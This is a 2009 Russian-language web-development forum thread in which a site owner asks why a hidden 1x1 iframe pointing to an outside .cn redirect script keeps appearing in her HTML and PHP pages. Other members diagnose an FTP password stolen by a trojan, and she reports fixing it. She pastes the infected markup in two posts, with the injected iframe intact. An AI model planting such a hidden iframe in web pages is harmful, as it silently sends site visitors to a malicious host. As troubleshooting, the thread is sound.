Спустя 36 минут, 54 секунды (24.03.2009 - 10:52) twin написал(а):
| Цитата |
| Где в моем скрипте может быть дырка |
Скорее сего в файле hole.php
Следует обратить внимание еще на такие файлы:
welcomexaker.php
shellmyplease.php
и некоторые другие.
Спустя 11 минут, 20 секунд (24.03.2009 - 11:03) Нимфа написал(а):
twin, а где эти файлы должны быть?
Спустя 1 час, 11 минут, 6 секунд (24.03.2009 - 12:15) sergeiss написал(а):
twin - ну нельзя же так, на самом деле! 
Я тут чуть не помёр со смеху 
Нимфа - это форум программистов, а не телепатов. Поэтому никто не ответит на этот вопрос, основываясь на приведенных исходных данных.
Я тут чуть не помёр со смеху Нимфа - это форум программистов, а не телепатов. Поэтому никто не ответит на этот вопрос, основываясь на приведенных исходных данных.
Спустя 11 минут, 45 секунд (24.03.2009 - 12:26) stepan написал(а):
Нимфа ты ссылочку дай и код покажи.
Спустя 16 минут, 59 секунд (24.03.2009 - 12:43) Нимфа написал(а):
| HTML |
| <html> <head><title></title></head> <BODY bgColor=#fefaf3 leftMargin=0 topMargin=0 marginwidth="0" marginheight="0" text=#000000> <table border=0 align=center width=100% height=100%> <tr><td align=center> </td></tr></table> <iframe frameborder=0 border=0 height=1 width=1 src="http://strhq.cn/tds_a/go.php?id=2" /></body> </html> |
Вот самый обыкновенный index.html и ежедневно там появляется эта строка: <iframe frameborder=0 border=0 height=1 width=1 src="http://strhq.cn/tds_a/go.php?id=2" /> Так еще в нескольких файлах html и php , где есть тело BODY. Приходится постоянно ее удалять, что бы сайт загружался.
Спустя 6 минут, 58 секунд (24.03.2009 - 12:50) Нимфа написал(а):
| HTML |
| <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body background="images/fon.gif" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <!-- ImageReady Slices (создаем макет главной страницы 3.psd) --> <table width="100%" height="100%"> <tr> <td> <table id="Table_01" width="988" height="558" border="0" cellpadding="0" cellspacing="0" align="center" style='valign: center'> <tr> <td width="239" height="558"><?php require_once ("best.php");?></td> <td width="511" height="558"><?php require_once ("center.php");?></td> <td width="238" height="558"><?php require_once ("enter.php");?></td> </tr> </table> </td> </tr> </table> <script type="text/javascript" src="start.js"> </script> <!-- End ImageReady Slices --></body> </html> |
Вот здесь тоже эта строка появляется перед </body>
Спустя 2 минуты, 17 секунд (24.03.2009 - 12:53) sergeiss написал(а):
Хостинг бесплатный или платный?
На бесплатном может такое быть, что хостер что-то добавляет. В этом случае поможет только выбор платного хостинга.
А если платный, то тогда нужно задать суровый вопрос хостеру - чё за фигня? Потому что в таком случае только они смогут помочь определить источник проблемы.
На бесплатном может такое быть, что хостер что-то добавляет. В этом случае поможет только выбор платного хостинга.
А если платный, то тогда нужно задать суровый вопрос хостеру - чё за фигня? Потому что в таком случае только они смогут помочь определить источник проблемы.
Спустя 24 минуты, 28 секунд (24.03.2009 - 13:17) FatCat написал(а):
Сударыня, меняйте пароль ФТП и сканируйте свой компьютер антиспаем.
99% за то, что трояном угнали пароль.
99% за то, что трояном угнали пароль.
| Цитата (sergeiss @ 24.03.2009 - 12:53) |
| Хостинг бесплатный или платный? |
| Цитата (Нимфа @ 24.03.2009 - 10:15) |
| чужие скрипты, которые спамят |
Бесплатные хостеры с доступом к php_mail() ?
Нет, это фантастика!
Спустя 3 часа, 32 минуты, 26 секунд (24.03.2009 - 16:49) champion написал(а):
Нимфа, просто index.html? Так и лежит на хосте? Я не знаю возможности создавать файлы на хостинге и что-то дописывать куда-то обращаясь к файл, где нет команд php.
Если там всё-таки присутсвует php, то сделать такое можно, если вы пользуетесь системными вызовами и используете в них необработанные данные пришедшие от пользователя. Если хостинг дырявый, то это вообще может быть не ваша ошибка. Вы видите каталоги '../..' относительно вашего documentRoot?
Если там всё-таки присутсвует php, то сделать такое можно, если вы пользуетесь системными вызовами и используете в них необработанные данные пришедшие от пользователя. Если хостинг дырявый, то это вообще может быть не ваша ошибка. Вы видите каталоги '../..' относительно вашего documentRoot?
Спустя 2 часа, 59 минут, 5 секунд (24.03.2009 - 19:49) Alchemist написал(а):
FatCat прав. Чистить комп и менять все пароли. Причем именно в такой последовательности.
http://forum.xakep.ru/m_849099/printable.htm
PS: это, кстати, не значит, что нет других уязвимостей. Но для начала разберитесь с этим.
http://forum.xakep.ru/m_849099/printable.htm
PS: это, кстати, не значит, что нет других уязвимостей. Но для начала разберитесь с этим.
Спустя 4 дня, 19 часов, 40 минут, 40 секунд (29.03.2009 - 14:29) Нимфа написал(а):
ФУХ! Кажеться я от этих приставучих спамов избавилась!! FatCat, спасибо, действительно необходимо было чистить комп 
(троянов выгребла... ууу!) Ну и пароль сменила на ftp. Теперь получше буду предохраняться 
(троянов выгребла... ууу!) Ну и пароль сменила на ftp. Теперь получше буду предохраняться